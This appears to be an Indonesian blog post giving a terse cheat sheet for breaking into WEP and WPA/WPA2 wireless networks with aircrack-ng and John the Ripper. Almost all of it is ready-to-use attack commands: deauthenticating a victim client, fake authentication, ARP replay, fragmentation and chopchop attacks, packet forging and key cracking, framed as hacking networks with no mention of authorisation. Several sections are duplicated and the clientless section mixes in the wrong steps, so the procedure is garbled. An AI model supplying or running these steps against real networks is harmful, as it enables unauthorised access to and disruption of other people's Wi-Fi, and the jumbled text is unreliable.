cheat sheet yang cukup padat namun singkat untuk hacking wireless network dengan Aircrack-ng . Aircrack-ng adalah kumpulan tools yang digunakan untuk melakukan hacking terhadap jaringan wireless. Tools yang termasuk dalam aircrack-ng antara lain: airmon-ng, airodump-ng, aireplay-ng, packetforge-ng, aircrack-ng dan masih banyak lagi lainnya.
Pre-requisite:- Backtrack, nggak harus tapi very recommended
- Wireless adapter dengan kemampuan packet injection. Saya pakai Alfa AWUS036H karena jangkauannya sangat jauh dan works out of the box di backtrack. Daftar lengkap wireless adapter yang compatible dengan backtrack bisa dilihat di daftar ini HCL: Wireless.
Cheat sheet ini mengcover sebagian besar kemungkinan situasi di dunia nyata. Skenario jaringan wireless yang bisa dihack dengan mengikuti cheat sheet ini adalah:
- WEP open authentication dengan client atau tanpa client (clientless WLAN)
- WEP shared key authentication (minimal harus ada 1 client)
- WPA/WPA2 Pre Shared Key (minimal harus ada 1 client)
Hampir semua jaringan wireless yang ada sekarang masuk dalam 3 kemungkinan di atas. Jaringan dengan WEP, praktis bisa dihack semua. Jaringan dengan WPA/WPA2 bisa dihack dengan dictionary attack, jadi sangat tergantung daftar password yang dimiliki. Dalam cheat sheet saya juga menyertakan cara menggunakan john the ripper untuk generate password list atau melakukan modifikasi daftar password dasar menjadi kata baru berdasarkan aturan tertentu.
Source nya seperti nie gan ->
Cracking WEP SKA/OA and WPA/WPA2 PSK Network with at least One Client Connected
1. Going to monitor mode: airmon-ng start <if> <channel>
1. Going to monitor mode: airmon-ng start <if> <channel>
2. Capture IVs and PRGA XOR for WEP or Handshake Packet for WPA/WPA2
airodump-ng -c <channel> --bssid <AP_MAC> -w <filename> <if>
3. WEP SKA and WPA/WPA2 Only: Deauthenticate a client
aireplay-ng -0 1 -a <AP_MAC> -c <VICTIM_MAC> <if>
4. WEP Only: Perform fake authentication
a. Open Authentication: aireplay-ng -1 0 -e <SSID> -a <AP_MAC> -h <OUR_MAC> <if>
b. Shared Key Authentication: aireplay-ng -1 0 -e <SSID> -y <PRGA_XOR> -a <AP_MAC> -h <OUR_MAC> <if>
5. WEP Only: Perform ARP request replay
aireplay-ng -3 -b <AP_MAC> -h <OUR_MAC> <if>
6. Crack key
a. WPA/WPA2:
• aircrack-ng -w <wordlist_file> -b <AP_MAC> <dumpfile>
• john --stdout --incremental:all | aircrack-ng -b <AP_MAC> -w - <dumpfile>
• john --stdout --rules --wordlist=<wordlist_file> | aircrack-ng -b <AP_MAC> -w - <dumpfile>
b. WEP: aircrack-ng [-n 64/128/152/256/512] -b <AP_MAC> <dumpfile>
Cracking Clientless Open Authentication WEP Network
1. Going to monitor mode: airmon-ng start <if> <channel>
2. Perform fake authentication
aireplay-ng -1 0 -e <SSID> -a <AP_MAC> -h <OUR_MAC> <if>
airodump-ng -c <channel> --bssid <AP_MAC> -w <filename> <if>
3. WEP SKA and WPA/WPA2 Only: Deauthenticate a client
aireplay-ng -0 1 -a <AP_MAC> -c <VICTIM_MAC> <if>
4. WEP Only: Perform fake authentication
a. Open Authentication: aireplay-ng -1 0 -e <SSID> -a <AP_MAC> -h <OUR_MAC> <if>
b. Shared Key Authentication: aireplay-ng -1 0 -e <SSID> -y <PRGA_XOR> -a <AP_MAC> -h <OUR_MAC> <if>
5. WEP Only: Perform ARP request replay
aireplay-ng -3 -b <AP_MAC> -h <OUR_MAC> <if>
6. Crack key
a. WPA/WPA2:
• aircrack-ng -w <wordlist_file> -b <AP_MAC> <dumpfile>
• john --stdout --incremental:all | aircrack-ng -b <AP_MAC> -w - <dumpfile>
• john --stdout --rules --wordlist=<wordlist_file> | aircrack-ng -b <AP_MAC> -w - <dumpfile>
b. WEP: aircrack-ng [-n 64/128/152/256/512] -b <AP_MAC> <dumpfile>
Cracking Clientless Open Authentication WEP Network
1. Going to monitor mode: airmon-ng start <if> <channel>
2. Perform fake authentication
aireplay-ng -1 0 -e <SSID> -a <AP_MAC> -h <OUR_MAC> <if>
3. Obtain PRGA XOR bits
a. Fragmentation attack: aireplay-ng -5 -b <AP_MAC> -h <OUR_MAC> <if>
b. Chopchop attack: aireplay-ng -4 –b <AP_MAC> -h <OUR_MAC> <if>
a. Fragmentation attack: aireplay-ng -5 -b <AP_MAC> -h <OUR_MAC> <if>
b. Chopchop attack: aireplay-ng -4 –b <AP_MAC> -h <OUR_MAC> <if>
4. Create ARP packet using PRGA XOR bits
packetforge-ng -0 –a <AP_MAC> -h <OUR_MAC> -k 255.255.255.255 –l 255.255.255.255 –y <xorfile> -w <outfile>
5. Capture IVs
airodump-ng -c <channel> --bssid <AP_MAC> -w <filename> <if>
6. Inject ARP packet that we have created in step 4
aireplay-ng -2 -r <packetfile> <if>
7. Crack key
aircrack-ng [-n 64/128/152/256/512] -b <AP_MAC> <dumpfile>
Tidak ada komentar:
Posting Komentar